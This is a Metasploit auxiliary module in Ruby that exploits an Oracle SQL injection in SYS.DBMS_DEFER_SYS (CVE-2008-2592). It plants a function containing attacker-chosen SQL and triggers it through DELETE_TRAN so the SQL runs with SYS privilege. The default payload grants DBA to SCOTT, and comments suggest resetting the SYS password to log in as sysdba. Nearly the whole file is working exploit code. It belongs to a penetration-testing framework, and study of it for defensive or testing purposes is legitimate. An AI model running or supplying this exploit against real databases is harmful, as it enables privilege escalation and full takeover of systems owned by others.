##
# $Id: dbms_defer_sys.rb
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##

require 'msf/core'


class Metasploit3 < Msf::Auxiliary

	include Msf::Exploit::ORACLE

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'SQL Injection via SYS.DBMS_DEFER_SYS',
			'Description'    => %q{
					This module will exploits a SQL Injection vulnerability in the SYS.DBMS_DEFER_SYS 							package. Any Oracle database user with EXECUTE privilege on the package 	SYS.DBMS_DEFER_SYS can exploit this vulnerability. By default, users granted DBA have the required privilege or anyone who is granted EXECUTE on SYS.DBMS_DEFER_SYS. Exploitation of this vulnerability allows an attacker to execute SQL commands with SYS privilege  Affected versions: Oracle Database	Server versions 9iR1, 9iR2, 10gR1, 10gR2 and 11gR1.  Fixed with Oracle Critical Patch update July 2008. See additional comments in source.
					},
			'Author'         =>  'CG |at| carnal0wnage |dot| com' ,
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision:$',
			'References'     =>
				[
					[ 'CVE', '2008-2592'],
					[ 'URL', 'http://www.appsecinc.com/resources/alerts/oracle/2008-05.shtml'],
					[ 'URL', 'http://seclists.org/fulldisclosure/2008/Aug/0229.html'],
				],
			'DisclosureDate' => 'JULY 29 2008'))

			register_options(
				[
					OptString.new('DBA', [ false, 'DB user to elevate to DBA.',  'SCOTT']),
					OptString.new('SQL', [ false, 'The SQL to execute.',  'GRANT DBA TO SCOTT']),
				], self.class)

	end

#from: http://seclists.org/fulldisclosure/2008/Aug/0229.html
#The DBA role in Oracle Database is not the same as SYSDBA privilege,
#which is granted to SYS. There are many things that a user granted the
#DBA role can't do - the most important being the ability to alter SYS
#owned objects. This is true on databases where
#O7_DICTIONARY_ACCESSIBILITY=FALSE (default value).

#read the rest of the FD post for more usage ideas

	def run
		c = connect
		p     = Rex::Text.rand_text_alpha(rand(8) + 1)
		query = datastore['SQL'].upcase
		

# fun queries
# set SQL "alter user SYS identified by my!supersecretpassword "
# connect as: sys/my!supersecretpasswordr@IP/SID as sysdba
# set SQL "GRANT DBA to user" 

		function = "
			CREATE OR REPLACE FUNCTION #{p} 
			RETURN NUMBER AUTHID CURRENT_USER AS
			PRAGMA AUTONOMOUS_TRANSACTION; 
			BEGIN
			EXECUTE IMMEDIATE '#{query}';
			COMMIT;
			RETURN(0);
			END;
			"
#so far I havent figured out how to see the output of the query with this module

# The user executing this module will have to be DBA or have execute privileges on the SYS.DBMS_DEFER_SYS package (which is just DBA by default)

		call = "
			BEGIN
			SYS.DBMS_DEFER_SYS.DELETE_TRAN ('''||'||user||'.#{p}||''','');
			END;
			"
		
		print_status("Sending function..")
		prepare_exec(function)
		
		print_status("Calling SYS.DBMS_DEFER_SYS.DELETE_TRAN...")
		prepare_exec(call)
		c.disconnect
	end

end